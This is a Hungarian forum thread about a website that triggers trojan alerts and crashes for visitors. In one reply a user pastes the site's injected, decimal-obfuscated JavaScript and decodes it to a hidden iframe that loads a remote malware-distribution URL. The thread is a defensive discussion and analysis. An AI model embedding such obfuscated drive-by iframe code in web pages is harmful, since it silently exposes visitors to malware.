Gyilkos honlap

sziasztok. Van egy igencsak érdekes jelenség, amit - lehet, lámaság -,
de nem tudok értelmezni.

Van egy partnerem, ahol a szerver linux (emiatt van rálátásom a
cégre), de a kliensek vinfosok (ezeket nem én idomítom). Az egyik
gépről felléptek erre a honlapra:

www_dot_zvvz_dot_cz

Rá ne lépjetek!

Szóval a tag aki föllépett a honlapra egyből kapott valami
vírus-alertet, karanén, meg minden. Trójai. Összeomlás.
Újratelepítés. Honlapra föllépés, Virusalert, majd összeomlás.

Lehetséges, hogy a honlap maga vírusterjesztő? Ilyet még
nem hallottam, bár kizárni a lehetőséget nem tudom. Vajon
milyen érdek fűződik ehhez a cég részéről (linux alol nézve
tök ártatlannak tűnik)? Lehet, hogy egy felnyomott honlap?

Vélemény?

Hozzászólások

avast nekem csipogott valami trojai miatt.
kapcsolat megszakitasat ajanlotta fel, kb. 5szor meg kellett nyomjam, most ha frissitem az oldalt, nem dobja fel, lehet mar be is szivtam? :)


[script language='JavaScript'][!--
function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062'; 
s+='060105102114097109101032115114099061034104116116112058047047116114097102102108111097100115046099111'; 
s=s+'109047111117116046112104112063115095105100061049034032119105100116104061053032104101105103104116061'; 
s=s+'053032115116121108101061034100105115112108097121058110111110101034062060047105102114097109101062'; 
t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;} if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));
document.write(String.fromCharCode(t)); t='';}}nbsp();
//--][/script]

na, dekodoltam, oldal betoltes utan a fenti kod ezt a kodot fuzi az oldal vegere:
[/textatea][/textarea][iframe src="http://traffloads.com/out.php?s_id=1" width=5 height=5 style="display:none"][/iframe]

Tyrael

Egy sütit helyez el a gépen, majd redirect...
A süti:
advtds_last_urls=91%7C103%7C1
Lejárat 2 nap múlva.
--
Coding for fun. ;)

Jó szöveg ez a "Rá ne lépjetek!". Ügyes, ha így akarsz látogatottságot szerezni az oldalnak :)

nem történt semmi. valami általam ismeretlen nyelven karattyolnak rajta, ez mondjuk mókás volt

wget -r www_dot_zvvz_dot_cz